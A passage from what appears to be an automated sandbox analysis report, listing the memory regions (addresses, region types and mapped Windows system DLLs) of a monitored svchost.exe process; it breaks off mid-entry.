region_type = pagefile_backed name = "pagefile_0x0000000001020000" filename = "" Region: id = 1256 start_va = 0x1050000 end_va = 0x1057fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 1257 start_va = 0x1060000 end_va = 0x106ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001060000" filename = "" Region: id = 1258 start_va = 0x1070000 end_va = 0x107ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001070000" filename = "" Region: id = 1259 start_va = 0x1080000 end_va = 0x108ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1260 start_va = 0x1090000 end_va = 0x109ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1261 start_va = 0x10a0000 end_va = 0x111ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 1262 start_va = 0x1120000 end_va = 0x112ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Region: id = 1263 start_va = 0x1130000 end_va = 0x113ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Region: id = 1264 start_va = 0x1140000 end_va = 0x114ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Region: id = 1265 start_va = 0x1150000 end_va = 0x115ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Region: id = 1266 start_va = 0x1160000 end_va = 0x116ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 1267 start_va = 0x1170000 end_va = 0x117ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001170000" filename = "" Region: id = 1268 start_va = 0x1180000 end_va = 0x118ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001180000" filename = "" Region: id = 1269 start_va = 0x1190000 end_va = 0x1197fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001190000" filename = "" Region: id = 1270 start_va = 0x11a0000 end_va = 0x11affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 1271 start_va = 0x11b0000 end_va = 0x11bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 1272 start_va = 0x11c0000 end_va = 0x123ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 1273 start_va = 0x1240000 end_va = 0x1247fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 1274 start_va = 0x1250000 end_va = 0x125ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Region: id = 1275 start_va = 0x12a0000 end_va = 0x12affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012a0000" filename = "" Region: id = 1276 start_va = 0x12e0000 end_va = 0x135ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 1277 start_va = 0x13d0000 end_va = 0x144ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013d0000" filename = "" Region: id = 1278 start_va = 0x1460000 end_va = 0x14dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001460000" filename = "" Region: id = 1279 start_va = 0x14e0000 end_va = 0x155ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014e0000" filename = "" Region: id = 1280 start_va = 0x1580000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001580000" filename = "" Region: id = 1281 start_va = 0x1630000 end_va = 0x16affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001630000" filename = "" Region: id = 1282 start_va = 0x16b0000 end_va = 0x172ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016b0000" filename = "" Region: id = 1283 start_va = 0x1750000 end_va = 0x175ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001750000" filename = "" Region: id = 1284 start_va = 0x1770000 end_va = 0x17effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001770000" filename = "" Region: id = 1285 start_va = 0x1830000 end_va = 0x18affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001830000" filename = "" Region: id = 1286 start_va = 0x18c0000 end_va = 0x193ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000018c0000" filename = "" Region: id = 1287 start_va = 0x1940000 end_va = 0x197ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001940000" filename = "" Region: id = 1288 start_va = 0x1980000 end_va = 0x19bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1289 start_va = 0x19e0000 end_va = 0x1a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019e0000" filename = "" Region: id = 1290 start_va = 0x1ab0000 end_va = 0x1b2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ab0000" filename = "" Region: id = 1291 start_va = 0x1b50000 end_va = 0x1bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b50000" filename = "" Region: id = 1292 start_va = 0x1bd0000 end_va = 0x1c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001bd0000" filename = "" Region: id = 1293 start_va = 0x1c50000 end_va = 0x1ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 1294 start_va = 0x1cd0000 end_va = 0x1d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cd0000" filename = "" Region: id = 1295 start_va = 0x1d60000 end_va = 0x1e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 1296 start_va = 0x1e60000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 1297 start_va = 0x1f90000 end_va = 0x200ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 1298 start_va = 0x2080000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 1299 start_va = 0x2140000 end_va = 0x21bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 1300 start_va = 0x21f0000 end_va = 0x226ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 1301 start_va = 0x2270000 end_va = 0x236ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002270000" filename = "" Region: id = 1302 start_va = 0x23b0000 end_va = 0x23bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023b0000" filename = "" Region: id = 1303 start_va = 0x23c0000 end_va = 0x243ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 1304 start_va = 0x2450000 end_va = 0x24cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 1305 start_va = 0x24d0000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 1306 start_va = 0x2560000 end_va = 0x25dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 1307 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1308 start_va = 0x2730000 end_va = 0x27affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002730000" filename = "" Region: id = 1309 start_va = 0x27c0000 end_va = 0x27cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027c0000" filename = "" Region: id = 1310 start_va = 0x27d0000 end_va = 0x28cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027d0000" filename = "" Region: id = 1311 start_va = 0x2910000 end_va = 0x298ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 1312 start_va = 0x29a0000 end_va = 0x2a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 1313 start_va = 0x2a50000 end_va = 0x2b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a50000" filename = "" Region: id = 1314 start_va = 0x2bc0000 end_va = 0x2c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bc0000" filename = "" Region: id = 1315 start_va = 0x2cc0000 end_va = 0x2d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cc0000" filename = "" Region: id = 1316 start_va = 0x2d50000 end_va = 0x2dcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d50000" filename = "" Region: id = 1317 start_va = 0x2dd0000 end_va = 0x2e8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1318 start_va = 0x2ec0000 end_va = 0x2f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 1319 start_va = 0x2f40000 end_va = 0x2fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1320 start_va = 0x3090000 end_va = 0x310ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003090000" filename = "" Region: id = 1321 start_va = 0x3110000 end_va = 0x330ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003110000" filename = "" Region: id = 1322 start_va = 0x3430000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 1323 start_va = 0x3540000 end_va = 0x35bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003540000" filename = "" Region: id = 1324 start_va = 0x35c0000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 1325 start_va = 0x3640000 end_va = 0x373ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003640000" filename = "" Region: id = 1326 start_va = 0x3740000 end_va = 0x37bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003740000" filename = "" Region: id = 1327 start_va = 0x3910000 end_va = 0x398ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003910000" filename = "" Region: id = 1328 start_va = 0x3a70000 end_va = 0x3aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a70000" filename = "" Region: id = 1329 start_va = 0x3b30000 end_va = 0x3baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b30000" filename = "" Region: id = 1330 start_va = 0x3bb0000 end_va = 0x3faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003bb0000" filename = "" Region: id = 1331 start_va = 0x4000000 end_va = 0x407ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 1332 start_va = 0x40c0000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040c0000" filename = "" Region: id = 1333 start_va = 0x4140000 end_va = 0x433ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 1334 start_va = 0x4340000 end_va = 0x443ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004340000" filename = "" Region: id = 1335 start_va = 0x4440000 end_va = 0x44bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 1336 start_va = 0x44c0000 end_va = 0x45bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 1337 start_va = 0x46a0000 end_va = 0x46affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 1338 start_va = 0x46b0000 end_va = 0x47affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046b0000" filename = "" Region: id = 1339 start_va = 0x47b0000 end_va = 0x48affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 1340 start_va = 0x48b0000 end_va = 0x49affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048b0000" filename = "" Region: id = 1341 start_va = 0x49b0000 end_va = 0x4aaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049b0000" filename = "" Region: id = 1342 start_va = 0x4ab0000 end_va = 0x5aaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ab0000" filename = "" Region: id = 1343 start_va = 0x5ae0000 end_va = 0x5b5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005ae0000" filename = "" Region: id = 1344 start_va = 0x5bd0000 end_va = 0x5c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005bd0000" filename = "" Region: id = 1345 start_va = 0x5cc0000 end_va = 0x5d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005cc0000" filename = "" Region: id = 1346 start_va = 0x5d40000 end_va = 0x5dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d40000" filename = "" Region: id = 1347 start_va = 0x5dd0000 end_va = 0x5e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005dd0000" filename = "" Region: id = 1348 start_va = 0x5e50000 end_va = 0x624ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1349 start_va = 0x6570000 end_va = 0x65effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006570000" filename = "" Region: id = 1350 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1351 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1352 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1353 start_va = 0x779d0000 end_va = 0x779d6fff monitored = 0 entry_point = 0x779d106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 1354 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1355 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1356 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1357 start_va = 0xff300000 end_va = 0xff30afff monitored = 0 entry_point = 0xff30246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1358 start_va = 0x7fef0ce0000 end_va = 0x7fef0f32fff monitored = 0 entry_point = 0x7fef0ce236c region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 1359 start_va = 0x7fef1150000 end_va = 0x7fef115efff monitored = 0 entry_point = 0x7fef1159a48 region_type = mapped_file name = "mspatcha.dll" filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll") Region: id = 1360 start_va = 0x7fef2260000 end_va = 0x7fef2433fff monitored = 0 entry_point = 0x7fef2296b00 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll") Region: id = 1361 start_va = 0x7fef2750000 end_va = 0x7fef29c9fff monitored = 0 entry_point = 0x7fef2782200 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 1362 start_va = 0x7fef4120000 end_va = 0x7fef413bfff monitored = 0 entry_point = 0x7fef41211a0 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 1363 start_va = 0x7fef4140000 end_va = 0x7fef41a1fff monitored = 0 entry_point = 0x7fef4141198 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 1364 start_va = 0x7fef41b0000 end_va = 0x7fef41e9fff monitored = 0 entry_point = 0x7fef41b1010 region_type = mapped_file name = "mprapi.dll" filename = "\\Windows\\System32\\mprapi.dll" (normalized: "c:\\windows\\system32\\mprapi.dll") Region: id = 1365 start_va = 0x7fef4890000 end_va = 0x7fef4900fff monitored = 0 entry_point = 0x7fef48cecc4 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 1366 start_va = 0x7fef4bd0000 end_va = 0x7fef4becfff monitored = 0 entry_point = 0x7fef4bd2f18 region_type = mapped_file name = "mmcss.dll" filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll") Region: id = 1367 start_va = 0x7fef4bf0000 end_va = 0x7fef4bfbfff monitored = 0 entry_point = 0x7fef4bf602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1368 start_va = 0x7fef4e30000 end_va = 0x7fef4ea0fff monitored = 0 entry_point = 0x7fef4e751d0 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 1369 start_va = 0x7fef4eb0000 end_va = 0x7fef4ec1fff monitored = 0 entry_point = 0x7fef4eb89d0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1370 start_va = 0x7fef4ed0000 end_va = 0x7fef4f84fff monitored = 0 entry_point = 0x7fef4f4cf80 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 1371 start_va = 0x7fef4f90000 end_va = 0x7fef4f97fff monitored = 0 entry_point = 0x7fef4f91414 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1372 start_va = 0x7fef4fa0000 end_va = 0x7fef4ff9fff monitored = 0 entry_point = 0x7fef4fddde0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 1373 start_va = 0x7fef5000000 end_va = 0x7fef5020fff monitored = 0 entry_point = 0x7fef50103b0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1374 start_va = 0x7fef5030000 end_va = 0x7fef509afff monitored = 0 entry_point = 0x7fef5074344 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 1375 start_va = 0x7fef50a0000 end_va = 0x7fef50b2fff monitored = 0 entry_point = 0x7fef50a1d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1376 start_va = 0x7fef50c0000 end_va = 0x7fef5121fff monitored = 0 entry_point = 0x7fef50fbd80 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 1377 start_va = 0x7fef5130000 end_va = 0x7fef525bfff monitored = 0 entry_point = 0x7fef51e0ef0 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 1378 start_va = 0x7fef5260000 end_va = 0x7fef5279fff monitored = 0 entry_point = 0x7fef5273fbc region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 1379 start_va = 0x7fef5280000 end_va = 0x7fef5303fff monitored = 0 entry_point = 0x7fef52d1118 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 1380 start_va = 0x7fef5310000 end_va = 0x7fef531dfff monitored = 0 entry_point = 0x7fef5315500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1381 start_va = 0x7fef5320000 end_va = 0x7fef5346fff monitored = 0 entry_point = 0x7fef53211a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 1382 start_va = 0x7fef5350000 end_va = 0x7fef5422fff monitored = 0 entry_point = 0x7fef53c8b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1383 start_va = 0x7fef5470000 end_va = 0x7fef5488fff monitored = 0 entry_point = 0x7fef5471104 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 1384 start_va = 0x7fef5490000 end_va = 0x7fef54dffff monitored = 0 entry_point = 0x7fef5491190 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 1385 start_va = 0x7fef54e0000 end_va = 0x7fef54e7fff monitored = 0 entry_point = 0x7fef54e1020 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 1386 start_va = 0x7fef54f0000 end_va = 0x7fef5514fff monitored = 0 entry_point = 0x7fef5508c54 region_type = mapped_file name = "browser.dll" filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll") Region: id = 1387 start_va = 0x7fef5520000 end_va = 0x7fef555cfff monitored = 0 entry_point = 0x7fef5521070 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 1388 start_va = 0x7fef5560000 end_va = 0x7fef55a6fff monitored = 0 entry_point = 0x7fef5561040 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 1389 start_va = 0x7fef55b0000 end_va = 0x7fef55f1fff monitored = 0 entry_point = 0x7fef55b17e4 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 1390 start_va = 0x7fef5600000 end_va = 0x7fef5610fff monitored = 0 entry_point = 0x7fef56014c0 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1391 start_va = 0x7fef5620000 end_va = 0x7fef56b1fff monitored = 0 entry_point = 0x7fef56951ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 1392 start_va = 0x7fef56c0000 end_va = 0x7fef5736fff monitored = 0 entry_point = 0x7fef56fe7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 1393 start_va = 0x7fef5740000 end_va = 0x7fef5779fff monitored = 0 entry_point = 0x7fef575d020 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 1394 start_va = 0x7fef5960000 end_va = 0x7fef5970fff monitored = 0 entry_point = 0x7fef5969e7c region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 1395 start_va = 0x7fef5a10000 end_va = 0x7fef5a73fff monitored = 0 entry_point = 0x7fef5a11254 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1396 start_va = 0x7fef5a80000 end_va = 0x7fef5af0fff monitored = 0 entry_point = 0x7fef5a81010 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1397 start_va = 0x7fef5b90000 end_va = 0x7fef5ba6fff monitored = 0 entry_point = 0x7fef5b91060 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1398 start_va = 0x7fef5bb0000 end_va = 0x7fef5d5ffff monitored = 0 entry_point = 0x7fef5bb1010 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 1399 start_va = 0x7fef6a50000 end_va = 0x7fef6ac3fff monitored = 0 entry_point = 0x7fef6a566f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1400 start_va = 0x7fef7f60000 end_va = 0x7fef7f7afff monitored = 0 entry_point = 0x7fef7f61198 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 1401 start_va = 0x7fef8080000 end_va = 0x7fef8088fff monitored = 0 entry_point = 0x7fef80811a0 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 1402 start_va = 0x7fef81d0000 end_va = 0x7fef81e4fff monitored = 0 entry_point = 0x7fef81d1020 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 1403 start_va = 0x7fef81f0000 end_va = 0x7fef8234fff monitored = 0 entry_point = 0x7fef8223644 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 1404 start_va = 0x7fef82c0000 end_va = 0x7fef8391fff monitored = 0 entry_point = 0x7fef8351a10 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 1405 start_va = 0x7fef8840000 end_va = 0x7fef8851fff monitored = 0 entry_point = 0x7fef88490bc region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 1406 start_va = 0x7fef89f0000 end_va = 0x7fef8a6bfff monitored = 0 entry_point = 0x7fef89f11d4 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 1407 start_va = 0x7fef8d20000 end_va = 0x7fef8d96fff monitored = 0 entry_point = 0x7fef8d2afd0 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 1408 start_va = 0x7fef8df0000 end_va = 0x7fef8eddfff monitored = 0 entry_point = 0x7fef8df12a0 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1409 start_va = 0x7fef8ee0000 end_va = 0x7fef8ee9fff monitored = 0 entry_point = 0x7fef8ee260c region_type = mapped_file name = "ktmw32.dll" filename = 